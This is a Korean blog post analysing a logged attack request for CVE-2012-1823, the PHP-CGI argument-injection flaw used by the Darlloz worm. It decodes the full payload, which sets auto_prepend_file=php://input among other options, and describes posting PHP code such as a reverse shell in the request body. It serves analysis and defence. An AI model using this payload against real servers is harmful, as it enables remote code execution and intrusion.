| 일 | 월 | 화 | 수 | 목 | 금 | 토 |
|---|---|---|---|---|---|---|
| 1 | 2 | |||||
| 3 | 4 | 5 | 6 | 7 | 8 | 9 |
| 10 | 11 | 12 | 13 | 14 | 15 | 16 |
| 17 | 18 | 19 | 20 | 21 | 22 | 23 |
| 24 | 25 | 26 | 27 | 28 | 29 | 30 |
- 해킹캠프 ctf
- 웹 해킹
- backdoorctf 2023 web
- 웹해킹
- RCE
- WarGame
- writeup
- Web
- backdoorctf 2023
- WEB-hacking
- XSS
- cve 분석
- Hacker.org
- 해외 wargame
- 해킹캠프
- hackingcamp ctf writeup
- thinkPHP
- 해외 워게임
- Web Hacking
- XSS-game
- wargame.kr
- CTF
- hacking
- backdoorctf writeup
- backdoorctf 2023 web Unintelligible
- hackctf
- webhacking
- php
- CVE
- hackingcamp
- Today
- Total
<OOO>
[CVE-2012-1823] 달로즈(Linux Darlloz) 본문
생각보다 다양한 공격이 들어오고 공격 로그를 살펴보면 RCE 취약점이 대부분 인것같다. 이번에도 새로운 공격 로그를 들고왔다!!
/cgi-bin/php-cgi?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E
뭔가 %가 엄청 많다.. 얘를 풀어보면
/cgi-bin/php-cgi?-d allow_url_include=on -d safe_mode=off -d suhosin.simulation=on -d disable_functions="" -d open_basedir=none -d auto_prepend_file=php://input -d cgi.force_redirect=0 -d cgi.redirect_status_env=0 -n
이런식으로 나오게 되는데 allow_url_include 를 on 시키고 safe_mode 를 off 시키는걸로 보아 설정파일을 건드는 공격인것 같다.
이 공격이 터지는 이유는 뭘까?
php-cgi 가 설정되어 있을 때 =(등호)문자가 없는 쿼리문자열을 제대로 처리하지 못해 발생한 공격이다.
자 이제 그럼 공격 구문을 분석해보자.
-d 는 php.ini 파일에 정의된 설정 내용을 조작하는데 allow_url_include, safe_mode, suhosin.simulation=on 과 같은 것들이 조작된다는 것이다.
allow_url_include : 외부 파일을 include, include_once 함수와 같이 포함될때 사용
auto_prepend_file=php://input : HTTP 요청 바디에 있는 데이터를 실행
이 글에선 -d 밖에 안나오지만 -n 과 -s 가 있다.
-n 은 php.ini 파일을 사용하지 않는다는 옵션이고 -s 는 소스코드에 색을 입혀 출력을 한다는 옵션이다.
-s 를 입력할 경우 웹 사이트의 소스코드가 노출이 된다.
이 공격에 해당하는 php 버전대는 다음과 같다.
PHP 5.3.12 이전 버전
PHP 5.4.2 이전 버전
어떻게 공격 하는가?
POST 형식으로 url에 index.php/?-d allow_include=1 -d auto_prepend_file=php://input 입력 후
body 부분에 php 코드 작성을 한다.(리버스쉘)
이 공격이 달로즈 라는 악성코드가 사용하는 기법이며 리눅스 서버를 대상으로 타겟이 설정 되는데 비트코인 채굴을 한다고 한다... RCE 취약점으로 비트코인 채굴이라니..
로그에는 php-cgi만 있지만 php4, php.cgi, php5, php 도 있다.
참고
leeminki.github.io/webhack/2019/02/27/WebHack_Study_22.html
'CVE 분석' 카테고리의 다른 글
| CVE-2022-26134 분석 (0) | 2022.06.04 |
|---|---|
| CVE-2017-14537 TrixBox Path Traversal (0) | 2021.06.05 |
| [CVE-2018-7600] Drupal 취약점 (Drupalgeddon2) (0) | 2021.04.14 |
| [CVE-2017-9841] PHPUnit RCE 취약점 (0) | 2021.04.08 |
| [CVE-2019-16759] ThinkCMF 취약점 (0) | 2021.04.08 |
